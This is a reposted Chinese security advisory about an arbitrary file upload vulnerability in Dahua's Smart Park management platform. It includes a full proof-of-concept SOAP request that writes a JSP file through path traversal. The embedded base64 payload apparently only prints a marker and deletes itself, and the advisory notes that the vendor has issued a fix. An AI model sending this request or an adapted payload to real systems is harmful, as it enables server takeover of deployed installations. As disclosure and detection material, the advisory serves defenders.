大华智慧园区综合管理平台poi任意文件上传漏洞

admin
admin
admin
102737
文章
87
评论
2024年4月2日00:30:23评论25 views字数 907阅读3分1秒阅读模式

漏洞描述

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。该平台emap/webservice/gi
s/soap/poi接口存在文件上传漏洞,攻击者利用该漏洞可以获取服务器权限。

漏洞请求包



POST /emap/webservice/gis/soap/poi HTTP/1.1Host: 127.0.0.1Content-Type: text/xml;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36



<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.poi.mapbiz.emap.dahuatech.com/"><soapenv:Header/><soapenv:Body><res:uploadPicFile><!--type: string--><arg0>/../../test.jsp</arg0><!--type: base64Binary--><arg1>PCUgb3V0LnByaW50bG4oIlFheDM2b25iIik7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTsgJT4=</arg1></res:uploadPicFile></soapenv:Body></soapenv:Envelope>




漏洞检测与利用


大华智慧园区综合管理平台poi任意文件上传漏洞


大华智慧园区综合管理平台poi任意文件上传漏洞


修复建议


厂商已更新(https://www.dahuatech.com)。


原文始发于微信公众号(南街老友):大华智慧园区综合管理平台poi任意文件上传漏洞




 


 



    

  • 
左青龙

    • 

  • 微信扫一扫
    • 

  • 
weinxin

    • 



    

  • 
右白虎

    • 

  • 微信扫一扫
    • 

  • 
weinxin

    • 
























admin 
    

  • 本文由  发表于 2024年4月2日00:30:23
    • 

  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  
大华智慧园区综合管理平台poi任意文件上传漏洞https://cn-sec.com/archives/2622334.html

    • 














 











 















发表评论

匿名网友
填写信息